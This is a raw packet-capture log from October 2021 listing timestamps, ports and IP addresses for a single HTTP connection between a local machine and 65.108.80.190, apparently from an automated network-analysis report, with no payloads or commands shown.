Oct 16, 2021 16:53:23.354545116 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354568958 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354589939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354621887 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354624987 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354645967 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354646921 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.354706049 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354716063 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.354760885 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.394237041 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394269943 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394288063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394304991 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394316912 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394331932 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394344091 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394360065 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394371986 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394378901 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.394383907 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394399881 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394409895 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.394416094 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394475937 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394491911 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394504070 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394515991 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394529104 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.394556046 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.394597054 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.394655943 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394674063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394690037 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394705057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394721985 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394737005 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394752979 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394768000 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394787073 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394804955 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394819975 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394835949 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394850969 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394865990 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394867897 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.394885063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394889116 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.394901991 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394903898 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.394933939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394949913 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394972086 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.394974947 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.394977093 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.394979954 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.394994974 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395010948 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395025969 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395028114 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395044088 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395057917 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395059109 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395062923 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395075083 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395078897 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395092010 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395109892 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395111084 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395113945 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395142078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395144939 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395159960 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395174026 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395190001 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395205975 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395220995 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395236015 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395251036 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395270109 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395287037 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395292997 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395303965 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395327091 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395337105 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395343065 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395344019 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395354986 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395370007 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395385027 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395385981 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395395041 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395401001 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395416021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395431042 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395436049 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395442009 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395447016 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395462036 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395481110 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395483971 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395497084 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395512104 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395533085 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395539045 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395548105 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395564079 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395577908 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395579100 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395595074 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395615101 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395631075 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395646095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395662069 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395677090 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395690918 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395706892 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395720005 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395721912 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.395750999 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395757914 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.395864010 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.433836937 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.433871984 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.433897972 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.433912992 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.433919907 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.433948040 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.433971882 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.433990002 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.433995008 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434000969 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434006929 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434017897 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434040070 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434041023 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434062004 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434065104 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434086084 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434108019 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434108019 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434124947 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434134007 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434135914 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434159994 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434163094 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434181929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434200048 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434205055 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434222937 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434228897 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434237957 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434251070 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434257984 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434273005 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434283018 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434295893 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434304953 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434323072 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434326887 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434348106 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434370041 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434391022 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434413910 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434417963 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434433937 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434436083 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434442043 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434449911 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434458017 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434475899 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434490919 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434505939 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434508085 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.434518099 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434542894 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434570074 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.434889078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435029984 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435201883 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435270071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435316086 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435359001 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435368061 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435408115 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435416937 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435425043 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435453892 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435498953 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435537100 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435576916 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435610056 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435616970 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435635090 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435642958 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435666084 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435691118 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435697079 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435733080 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435774088 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435813904 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435847044 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435862064 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435862064 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435909033 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435925961 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435935974 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435942888 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.435949087 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.435992002 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436008930 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436033010 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436055899 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436069965 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436072111 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436093092 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436111927 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436142921 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436151981 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436165094 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436201096 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436220884 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436244965 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436283112 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436325073 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436353922 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436363935 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436377048 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436384916 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436392069 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436402082 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436424017 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436441898 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436477900 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436481953 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436495066 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436530113 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436547995 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436573982 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436605930 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436613083 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436634064 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436652899 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436691999 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436728954 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436759949 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436788082 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436799049 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436810017 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436814070 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436837912 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436840057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436872005 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436878920 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436891079 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436918020 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436933994 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436956882 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.436969995 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.436997890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437010050 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437043905 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437047958 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437091112 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437097073 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437129021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437140942 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437169075 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437175989 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437207937 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437216043 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437246084 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437258959 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437299013 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437303066 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437338114 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437350988 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437376976 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437388897 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437416077 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437427998 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437454939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437463045 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437500000 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437504053 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437549114 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437555075 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437587023 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437627077 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437629938 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437669039 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437683105 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437707901 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437722921 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437736034 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437763929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437802076 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437849045 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437870026 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437887907 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437891960 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437892914 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437896013 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437932968 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437947035 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.437972069 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.437985897 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.438011885 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.438024044 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.438050985 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.438069105 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.438090086 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.438102007 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.438119888 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.438143015 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.438170910 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.908029079 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.947530031 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947554111 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947572947 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947587967 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947603941 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947621107 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947666883 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.947674990 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947693110 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947709084 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947717905 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.947721004 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947732925 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947748899 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947765112 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947783947 CEST	80	49737	65.108.80.190	192.168.2.7
